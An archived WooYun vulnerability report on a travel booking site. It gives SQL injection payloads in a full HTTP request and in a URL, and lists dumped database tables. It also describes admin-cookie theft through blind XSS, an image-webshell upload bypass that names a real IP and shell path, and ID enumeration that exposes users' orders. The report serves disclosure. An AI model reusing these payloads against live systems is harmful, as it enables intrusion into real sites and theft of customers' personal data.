当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191726

漏洞标题:八个六阳光航空旅游网几处风险泄露用户个人信息\个人登录密码\订单信息(影响10W+用户数据)

相关厂商:八个六阳光航空旅游网

漏洞作者: 路人甲

提交时间:2016-04-05 13:06

修复时间:2016-05-20 13:10

公开时间:2016-05-20 13:10

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

漏洞小集合

详细说明:

一 :
先贴出用户量:18W+

12.png


0x1:先来两枚SQL注入漏洞:
----------------------------------------------------------------------------------------

POST /ajax/querySpeTicket4Date.action HTTP/1.1
Host: www.66666666.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: application/json, text/javascript, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.66666666.com/speTic4Recently.action?depCode=CGO&reaCode=LHW&flightDate=2016-03-30
Content-Length: 23
Cookie: JSESSIONID=460F770E422FAB60C7D2A787FE81757D; Hm_lvt_f5e3bd8d027c1dcf84d56a9886d322db=1459252966; Hm_lpvt_f5e3bd8d027c1dcf84d56a9886d322db=1459253581; Hm_lvt_eb39dfed1031da9fa5752da0eb74b1da=1459252966; Hm_lpvt_eb39dfed1031da9fa5752da0eb74b1da=1459253581; depCode=CGO; depCity=%E9%83%91%E5%B7%9E
Connection: keep-alive
depCode=CGO21257723'%20or%20'4816'%3d'4816&reaCode=LHW


参数:depCode存在注入点

6.png


--------------------------------------------------------------------------------------
0x2:第二枚注入:
http://www.66666666.com//sbnapp/member/member!coupon.action?pt=ios&userId=woyun' or '1'='1
正常情况下是没有任何有优惠券的:

9.png


带入语句满满的全是爱:

8.png


带入时间延时语句成功执行:

7.png


10.png


Database: ah7q89up
[105 tables]
+----------------------+
| c_cou_ext |
| c_coupon |
| c_type |
| c_type_ext |
| h_area |
| h_brand |
| h_data |
| h_geo |
| h_geo_extra |
| h_hotel |
| h_hotel_id |
| h_hotel_imgs |
| h_hotel_lack |
| h_hotel_list |
| h_hotel_log |
| h_hotel_member_list |
| h_hotel_rooms |
| h_o_i_recipient |
| h_order |
| h_order_card |
| h_order_contact |
| h_order_customer |
| h_order_invoice |
| l_area |
| l_lines |
| l_lines_arrcity |
| l_lines_collections |
| l_lines_date |
| l_lines_hot_city |
| l_lines_trip |
| l_order |
| l_order_type |
| t_act_goods |
| t_act_lottery_acount |
| t_act_lottery_nper |
| t_act_lottery_order |
| t_act_order |
| t_act_order_ly |
| t_act_pro |
| t_act_pro_jfcode |
| t_act_pro_order |
| t_act_yw |
| t_activity |
| t_activity_ca |
| t_activity_hb |
| t_ad_picture |
| t_advice |
| t_airline |
| t_announcement |
| t_app_tui |
| t_app_tui_act1 |
| t_area |
| t_authority |
| t_cabin_close |
| t_city_airport |
| t_credentials |
| t_flight_cabin |
| t_flight_trans |
| t_giftcart |
| t_giftorder |
| t_giftorder_detail |
| t_groupticket_apply |
| t_iata |
| t_lottery |
| t_member |
| t_message |
| t_name_list |
| t_orderflight |
| t_pay_mess |
| t_pro_appraise |
| t_pro_picture |
| t_procount |
| t_product |
| t_pun_rate |
| t_que_answer |
| t_question |
| t_restdata |
| t_role |
| t_role_authority |
| t_sort |
| t_specity |
| t_speflight |
| t_speticket |
| t_sys_log |
| t_ticket_remind |
| t_ticketorder |
| t_ticketperson |
| t_user |
| t_user_address |
| t_user_answer |
| t_user_coupon |
| t_user_ext |
| t_user_ggk |
| t_user_lottery |
| t_user_role |
| t_user_wx |
| t_version |
| t_visa |
| t_visa_area |
| t_visa_order |
| t_visa_order_type |
| t_visa_type |
| t_visit_log |
| t_visitor_his_log |
| t_visitor_log |
+----------------------+


贴出站内部分用户的账户密码:

13.png


后台管理员账户信息:

17.png

漏洞证明:

二 : 也是个高危漏洞,盲打后台前端插入语句:

14.png


返回COOKIE见图:

15.png


现在管理员COOKIE,账户密码都有了,想怎么进就怎么进,后台地址:

16.png


各种订单,酒店订单,飞机订单,旅游订单,上万数据订单信息及用户敏感信息:

1.png


2.png


3.png


上传处校验不严,只是对后缀名与文件头部特征码进行校验,制造一个图片马截断改后缀即可:
寻找getshell方法,不知道什么原因马总是出现解析错误,遇到过很多次未能解决

http://116.255.199.103/sbn/pic/resources/giftPictures/ma.jsp


--------------------------------------------------------------------------------------
三:越权问题,可查看任意用户订单信息很多处,酒店订单,旅游订单,机票订单,不再一一说明,指出一处见下图:

http://www.66666666.com/sbnapp/travel/travel!getOrderDetail.action?id=280


23.png


遍历一下ID可查看订单信息:

4.png


5.png

修复方案:

过滤防范SQL注入与XSS,权限验证防止越权漏洞。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:20 (WooYun评价)